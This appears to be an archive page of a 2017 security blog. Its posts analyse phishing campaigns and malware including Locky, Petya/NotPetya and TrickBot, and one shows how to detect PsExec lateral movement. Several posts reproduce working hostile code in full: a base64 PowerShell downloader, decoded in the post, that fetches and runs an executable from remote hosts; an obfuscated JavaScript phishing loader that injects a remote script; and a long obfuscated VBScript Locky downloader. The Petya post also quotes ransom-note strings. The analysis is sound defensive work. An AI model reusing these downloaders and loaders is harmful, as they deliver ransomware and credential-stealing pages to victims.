Thursday, October 19, 2017

DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis

This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.

Flow:
Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute

Email:
Subject: Emailed Invoice - *
Attachment: l_123456.doc-

Downloader:
FileName: I_099292.doc


MD5: 0910541c2ac975a49a28d7a939e48cd3
SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a
SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126

DDE Flow:

1. Open the doc
2. This msg pops up:



3. Nothing on the first page:
 

 4. Scroll to the end:

 

5. This is the DDE code:










6. Toggle code:

 




7. This should give you the actual code:
 


This downloader was found to be serving Locky.


The above DDE code reaches out and grabs the string from arkberg-design*fi, which is Base64 encoded:

*DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwBoAGEAbQBhAG4AaQBjAC0AZQB4AHQAcgBhAGMAdABzAC4AYgBpAHoALwBlAHUAcgBnAGYAOAAzADcAbwByACIALAAiAGgAdAB0AHAAOgAvAC8AYwBlAG4AdAByAGEAbABiAGEAcAB0AGkAcwB0AGMAaAB1AHIAYwBoAG4AagAuAG8AcgBnAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiACwAIgAiACwAIgBoAHQAdABwADoALwAvAGMAbwBuAHgAaQBiAGkAdAAuAGMAbwBtAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQA*cgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIA*AkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAHIAZQBrAGEAawB2AGEAMwAyAC4AZQB4AGUAIgAJAA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAGYAcAANAAoACQAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA0ACgAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAGYAcAApAA0ACgAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAANAAoACQBiAHIAZQBhAGsADQAKAH0ADQAKAEMAYQB0AGMAaAANAAoAewANAAoAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoADQAKAAkADQAKAH0ADQAKAA==*

Decoded:


$urls = "hxxp://shamanic-extracts.biz/ eurgf837or","hxxp://centralbaptistchurchnj.org/ eurgf837or","","hxxp://conxibit.com/ eurgf837or"

foreach($url in $urls){

Try

{

                Write-Host $url  

                $fp = "$env:temp\rekakva32.exe"

                Write-Host $fp

                $wc = New-Object System.Net.WebClient

                $wc.DownloadFile($url, $fp)

                Start-Process $fp

                break

}

Catch

{

   Write-Host $_.Exception.Message

}



               

}


The payload is Locky.



:)
























Share:

Wednesday, September 27, 2017

Phishing - google redirect function used in link for phising WestPac bank

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake westpac page.
Just another phishing email with a twist.


Share:

Tuesday, September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything. 

Syntax Highlighting:

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f;  apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

function f8ce53222(ll1u8137, rx3oj311) {
  var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
  for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
  for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
  for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
  return jxl077g53
}

var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser


var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");

*/ zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>

</body>
</html>
Share:

Monday, September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in simple VBS, launched by WScript on a Win host. 

Currently serving Locky Ransomware


Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if

       

    End Function
   
Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function




Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

  UltraXgettingBelish = "User"




Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")   
End Function

 Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

  Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)


 UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function


Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object  

Advancedmantel2 ="Microsoft." + Advancedmantel2+  "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"


Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ),  TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8   

End Function


Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function


Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send
   
End Function
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")



  Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i  = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
  End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

   


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))


Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then
   
   
mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if   


Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
   
   
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
   
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
   
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 Valery = 89210


UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg
   
    For i = 1 To UBound(Flag1, 2)
       
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
   
End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"

rdde = 19


lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume  next

Valery =  Valery +33
 UltraXgetting4 = MarketPlace + mual(i)
 UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
dr1=2

rdde = rdde + 91


SetUA()
UltraXgettingFuks " d "
If UltraXgettingRickyTIcky.Status +3 = 203 Then
UltraXgettingstatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
 UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis

F3 "",4
StateUovertakes4000.Type = 1
 StateUovertakes4000.Open
StateUovertakesgetting2 22
WriteCD StateUovertakes4000,UltraXgettingResponseBody
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040  < UltraXgettingJohnSnowu Then
  drba =55
 UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"
End If
 


triada = 341
end if


Share:

Tuesday, August 1, 2017

Detecting Lateral Movement - PsExec execution with Demo





PsExec can be used quite easily on any network to move laterally from one system to another. Here's one way of detecting lateral movement.


Demo:
We'll create a PsExec session and then look for the events and note them down. These can then be used for monitoring alerts or forensic investigations.

Launch a PsExec session from one machine to another and note the time:

Machine A -
 

Session launched on Machine B - 





Now we look through the Windows Events Viewer and find the events for this session.
Looking through the Security events, we can see in the image below the Logon event (ID 4624)  was created for the session that we launched (note the timestamp).



Details of the event should give us more information on the event.




This tells us clearly that the logon was from our Machine A, through PsExec:
Next, we need to look for the service that was created as part of this session. PsExec creates the process PSEXECSV.exe on the host system when successfully launched. 


In order to find that the process created on this host system (Machine B), we need to look under the System events.




Look at the details:







These are the events you need to monitor/investigate for PsExec execution on the host systems. The whole process can be automated through a SIEM for passive monitoring for security events or can be executed ad-hoc as needed for investigations and incident response.

When investigating systems post-incident, you can acquire the events files at this location in Win8* :

C:\Windows\System32\winevt\Logs




Once acquired, these files can be reviewed in the Windows Events Viewer on your investigation machine.

:)

Share:

Tuesday, July 25, 2017

Thursday, July 20, 2017

TrickBot Banking Malware - some features of interest

Here's one:

It creates this dir - c:\Users\%username%\appdata\Roaming\winapp\

Now - if you're thinking that creating this dir yourself and then read/write protecting it will make this malware not execute fully, you're wrong :)

If it cant access that location to create the directory, it simply dumps the PE on Desktop and executes from there.

Cool stuff!
Share:

Thursday, July 6, 2017

Wednesday, June 28, 2017

Petya NotPetya Quick and Dirty Analysis

I'll leave the detailed version to hasherezade :)
This is a quick look at what the malware is about and what functions it uses.

Looks for physical drives on the infected computer.



Here's the bundled-in psexec, as dllhost.dat:

Here's another PE, looks like used to launch the runndll32.exe as perfc.dat:


Infection starts.



dllhost.dat > PsExec




System restart.

Encryption.














Provider: MS RSA AES


 This is where it starts in user-land.


All the familiar messages.





And here's all the WMI stuff.
Also, note that rundll32.exe is called by '%s' - perfc.dat in this case.










Running PSExec on the entire subnet, after accepting the EULA of course :)


 Extensions to be encrypted.





Looks out for the extensions it wants to encrypt (hard-coded, different to the ones seen earlier in Petya mid-2016).


Encryption part.












And here are all the encryption functions that are called.

Like I said earlier, this is a quick look into the malware not a detailed analysis. But it should give you some insight into how it works.


Share:

Tuesday, June 27, 2017

Petya extentions targetted

.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb
.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql
.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
Share:

Petya Mem Strings

Some interesting strigns pulled from the Petya executble:
 

<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.Shutdown"
    type="win32"
<description>Windows Shutdown and Annotation Tool</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>


00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""

c:\src\Pstools\psexec\EXE\Release\psexec.pdb
c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb

Direct PsExec to run the application on the remote
computer or computers specified. If you omit the computer
ComputerName
CONIN$
Connecting to 192.168.xx.xx...
Connecting to 192.168.xx.xx...
                                                                              
Starting PsExec service on 192.168.xx.xx...
                                                                              
Connecting with PsExec service on 192.168.xx.xx...
                                                                              
Starting %WINDIR%\System32\rundll32.exe on 192.168.xx.xx...
Connecting with PsExec service on 192.168.xx.xx...
ConnectNamedPipe
CONOUT$
ControlService

that file and print sharing services are enabled on %s.
the password is transmitted in clear text to the remote system.
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.

Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
UseDelayedAcceptance


00024659-00002880,rundll32.exe,"%WINDIR%\System32\rundll32.exe",2880,2292,2017-6-27.06:42:15.996,"C:\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1""
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2.    Send your Bitcoin wallet ID and personal installation key to e-mail
[j j
\Sessions\1\Windows\ApiPort
\ThemeApiPort
AddressFamily
AppData
AQIAAA5mAAAApAAA6vAGjmKL1o/z1WoWFbD8HoXQxvta/l23/sisYXlY3R/b2LYb
GBVOO2YNwJuwEsKdn6WHHKMbDnT/orfba9XaLwwelJeehFIraOnQSXSuVih7CWRJ
AuthenticodeEnabled
AutodialDLL


DhcpDomain
DhcpNameServer
Dhcpv6Domain
Disable
DisableBranchCache
DisableEngine
DisableImprovedZoneCheck
DisableLocalOverride
DisableMetaFiles
DisableUserModeCallbackFilter
DisplayString
dllhost.dat


Enabled
EnableDhcp
EnableLinkedConnections
EnablePunycode
Export
FE04.tmp
FipsAlgorithmPolicy
HelperDllName
Hostname
Image Path
l your files safely and easily.  All you
 need to do is submit the payment and purchase the decryption key.
 Please follow the instructions:
 1. Send $300 worth of Bitcoin to following address:


Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have b
PackedCatalogItem
PageAllocatorSystemHeapIsPrivate


TROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED
  IN!
Type
UseDelayedAcceptance
UseHostnameAsAlias
UseOldHostResolutionOrder
Users
Version
Webclient
Windows
WinHttpSettings
WinSock 2.0 Provider ID
WinSock_Registry_Version
wowsmith123456@posteo.net.


00026129-00001968,FE04.tmp,"%TEMP%\FE04.tmp",1968,2880,2017-6-27.06:45:10.817,"%TEMP%\FE04.tmp" \\.\pipe\{E532AB34-D5C5-4AA8-9511-A05572AE75BC}""
%OSUSER%-PC\%OSUSER%:123456


00026131-00002720,schtasks.exe,"%WINDIR%\System32\schtasks.exe",2720,2724,2017-6-27.06:45:08.804,"" /TR "%WINDIR%\system32\shutdown.exe /r /f" /ST 07:45""
(40,4):LogonType:
ERROR:
ERROR: No mapping between account names and security IDs was done.
No mapping between account names and security IDs was done.
00026195-00002796,shutdown.exe,"%WINDIR%\System32\shutdown.exe",2796,1820,2017-6-27.06:45:09.425,"%WINDIR%\system32\shutdown.exe" /r /f""
0 0(000


Shutdown and Annotation Tool
00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""
!This program cannot be run in DOS mode.
"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"


%WINDIR%\System32\rundll32.exe started on 192.168.56.11 with process ID 2996.

 
Share:

Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (eg. ThreatConnect etc). You can grab the IOCs column (eg. IPs) and create a new csv file with just that column - this new CSV can then be ingested into any other platform. You can pick and chose what column(s) you want to carry over into the new CSV - minor tweaks would be required. I'll keep updating this script and make it as interactive as possible - watch the gitHub repo!
Get it here.


Share:

Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasnt been anything posted here on this sire regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world, based on the well-known SMBv1 vulnerability that was released by ShadowBrokers very recently. It is looking like the internet is being scanned for vulnerable computers and then attacked with the malware.

Easy wins: disable SMB, make sure you are not blocking the killSwitch.

There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you cant patch your systems.


Share:

Wednesday, May 10, 2017